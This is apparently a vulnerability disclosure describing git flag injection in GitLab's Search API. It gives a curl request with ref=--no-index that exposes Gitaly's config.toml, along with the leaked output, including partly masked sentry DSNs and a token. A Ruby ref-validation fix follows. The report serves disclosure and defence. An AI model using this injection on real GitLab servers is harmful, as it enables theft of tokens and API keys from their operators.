GitLab - Git flag injection - Search API with scope 'blobs'

Summary:

GitLab 12.1.6 fixed the Search API for the wiki_blob scope, but the blobs scope is still affected by git flag injection, which allows reading arbitrary files under /var/opt/gitlab/gitaly, including config.toml.

Steps to reproduce:

Call the Search API with the ref parameter set to --no-index, search for a common pattern such as . or a, and set scope to blobs:

curl --header "PRIVATE-TOKEN: $TOKEN" 'http://gitlab-vm.local/api/v4/projects/4/search?scope=blobs&search=.&ref=--no-index'

[{"basename":null,"data":"VERSION\u00001\u0000Gitaly, version 1.53.2\n","filename":null,"id":null,"ref":"--no-index","startline":0,"project_id":4},{"basename":null,"data":"config.toml\u00001\u0000# Gitaly configuration file\nconfig.toml\u00002\u0000# This file is managed by gitlab-ctl. Manual changes will be\nconfig.toml\u00003\u0000# erased! To change the contents below, edit /etc/gitlab/gitlab.rb\nconfig.toml\u00004\u0000# and run:\nconfig.toml\u00005\u0000# sudo gitlab-ctl reconfigure\nconfig.toml\u00006\u0000\nconfig.toml\u00007\u0000socket_path = '/var/opt/gitlab/gitaly/gitaly.socket'\nconfig.toml\u00008\u0000bin_dir = '/opt/gitlab/embedded/bin'\nconfig.toml\u00009\u0000\n","filename":null,"id":null,"ref":"--no-index","startline":0,"project_id":4}]

The ref parameter is ultimately passed to git grep as a positional argument. Setting it to --no-index turns it into an option, so git grep searches the current working directory, including files that are not managed by git:

/opt/gitlab/embedded/bin/git --git-dir /var/opt/gitlab/git-data/repositories/@hashed/6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.git grep --ignore-case -I --line-number --null --before-context 2 --after-context 2 --perl-regexp -e a --no-index
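As an added illustration of the fix (not GitLab's or Gitaly's own code), the Ruby below builds the same git grep argument vector as above but validates the user-supplied ref before it is placed on the command line, so a value such as --no-index is rejected instead of being parsed as an option; the git_dir and pathspecs are constructed, and the ref rules are an assumed subset of git's check-ref-format rules.

```ruby
require "open3"

# Reject anything git's option parser could read as a flag, plus an assumed
# subset of the characters git check-ref-format forbids in a ref name.
def safe_ref?(ref)
  return false if ref.nil? || ref.empty?
  return false if ref.start_with?("-")            # --no-index, -e, -O ...
  return false if ref.include?("..") || ref.include?("@{")
  return false if ref.end_with?(".lock") || ref.end_with?("/")
  ref !~ /[\x00-\x20\x7f~^:?*\[\\]/
end

# Build the `git grep` invocation from the report, with the ref validated and
# the pattern passed through -e so neither value can become an option.
# git grep stops option parsing at the first positional argument (the ref);
# any pathspecs are placed after "--".
def grep_argv(git_dir, pattern, ref, pathspecs = [])
  raise ArgumentError, "refusing ref #{ref.inspect}" unless safe_ref?(ref)
  argv = [
    "git", "--git-dir", git_dir, "grep",
    "--ignore-case", "-I", "--line-number", "--null",
    "--before-context", "2", "--after-context", "2",
    "--perl-regexp", "-e", pattern,
    ref,
  ]
  argv += ["--", *pathspecs] unless pathspecs.empty?
  argv
end

# Execute without a shell: Open3 with an argv array never re-parses the
# arguments, so quoting tricks cannot introduce further options either.
def run_grep(git_dir, pattern, ref, pathspecs = [])
  out, status = Open3.capture2(*grep_argv(git_dir, pattern, ref, pathspecs))
  # git grep exits 1 when nothing matched; only other codes are failures
  unless [0, 1].include?(status.exitstatus)
    raise "git grep failed (exit #{status.exitstatus})"
  end
  out
end
```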

Impact:

config.toml contains a lot of sensitive information, such as API keys and tokens. For example, testing on gitlab.com showed that the file contains sentry.io API tokens as well as the gitaly token:

https://gitlab.com/api/v4/projects/2009901/search?scope=blobs&search=a&ref=--no-index

sentry_dsn = 'https://927bee37df654608xxxxxxxxxxxxxxxx:[email protected]/16
ruby_sentry_dsn = 'https://8ff7dd344e1d4976xxxxxxxxxxxxxxxx:[email protected]/29

token = 'yfZTE0Oxxxxxxx'

Origin: